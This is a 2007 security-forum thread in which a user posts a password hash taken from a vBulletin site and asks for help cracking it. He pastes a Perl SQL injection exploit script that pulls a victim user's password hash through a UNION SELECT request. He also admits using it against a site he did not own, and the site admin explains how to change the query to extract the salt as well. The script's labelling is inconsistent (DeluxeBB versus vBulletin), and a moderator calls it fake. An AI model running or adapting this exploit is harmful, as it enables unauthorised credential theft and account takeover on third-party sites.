Waraxe IT Security Portal
Login or Register
December 19, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 106
Members: 0
Total: 106
Full disclosure
Stored XSS with Filter Bypass - blogenginev3.3.8
[SYSS-2024-085]: Broadcom CA Client Automation - Improper Privilege Management (CWE-269)
[KIS-2024-07] GFI Kerio Control <= 9.4.5 Multiple HTTP Response Splitting Vulnerabilities
RansomLordNG - anti-ransomware exploit tool
APPLE-SA-12-11-2024-9 Safari 18.2
APPLE-SA-12-11-2024-8 visionOS 2.2
APPLE-SA-12-11-2024-7 tvOS 18.2
APPLE-SA-12-11-2024-6 watchOS 11.2
APPLE-SA-12-11-2024-5 macOS Ventura 13.7.2
APPLE-SA-12-11-2024-4 macOS Sonoma 14.7.2
APPLE-SA-12-11-2024-3 macOS Sequoia 15.2
APPLE-SA-12-11-2024-2 iPadOS 17.7.3
APPLE-SA-12-11-2024-1 iOS 18.2 and iPadOS 18.2
SEC Consult SA-20241211-0 :: Reflected Cross-Site Scripting in Numerix License Server Administration System Login
St. Poelten UAS | Multiple Vulnerabilities in ORing IAP
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other hashes -> I need help decrypting this hash.
Post new topicReply to topic View previous topic :: View next topic
I need help decrypting this hash.
PostPosted: Wed Nov 28, 2007 11:14 pm Reply with quote
MaXe
Beginner
Beginner
Joined: Nov 29, 2007
Posts: 3




This hash is from a vbulletin 3.6.8 ..
a4e0affa117a1eea993ddc91d148666e

Yes i know there's a salt, so to ask for a little more help here is the used script. (And yes it worked fine as apparently it dropped the md5 hash, the problem is now i want it to drop the Salt as well so i can try crack it, but since the SQL injection request confuses me i need help with that.)

PS: I think it's the 6th or 7th column from the last in the MySQL database which is the Salt. (if you take it as in the Injection, i could be wrong though).

I hope anyone can help me Sad

Code:
#!/usr/bin/perl

use IO::Socket;


print q{
######################################################
# DeluxeBB Remote SQL Injection Exploit

#
# vbulletin Remote SQL Injection Exploit #
# // SekoMirza // Turkish Hackerz #
######################################################
};

if (!$ARGV[2]) {

print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid



perl dbbxpl.pl www.somesite.com /forum/ 1


};

}


$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid =

$ARGV[5];

print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print

"[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path = $dir;
$path

.=
"misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%

20WHERE%20(uid='".$user ;


print

"[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

print

"[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print

$socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";



print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while

($answer = <$socket>)
{

if ($answer =~/(\w{32})/)
{

if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print "---------------------------------------------------------------------

-----------------\r\n";

}
exit();
}

}
print "------------------------------------------------------------------------------------------------\r\n";

#########################################################
#Shoutz: #
#

#
# My Sweet -> Caramel #
# For Mp3s -> Hypn0sis #
# For Support -> [WwW.StarHack.Org] #
# My Bro ->

PhantomOrchid #
# My Preceptor -> Earnk Kazno #
#########################################################

View user's profile Send private message
PostPosted: Thu Nov 29, 2007 3:47 am Reply with quote
Sm0ke
Moderator
Moderator
Joined: Nov 25, 2006
Posts: 141
Location: Finland




fake exploit, Smile
dont even try to get salt whit that its fake
View user's profile Send private message
PostPosted: Thu Nov 29, 2007 12:01 pm Reply with quote
MaXe
Beginner
Beginner
Joined: Nov 29, 2007
Posts: 3




What part of the code says it's fake? I can't see how it should be fake, as
i tried editing my cookies on the victim site and then the admin shutted the
site down and then he changed his pass as it spitted out a new hash.
View user's profile Send private message
PostPosted: Thu Nov 29, 2007 4:02 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




It all depends from sql table field name. If it's 'salt', then just make easy replace:

Code:

UNION+SELECT+0,pass,0


with

Code:

UNION+SELECT+0,salt,0


But you need to modify that script a little bit more, so that filter regex will match the answer.
View user's profile Send private message Send e-mail Visit poster's website
I need help decrypting this hash.
www.waraxe.us Forum Index -> All other hashes
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.044 Seconds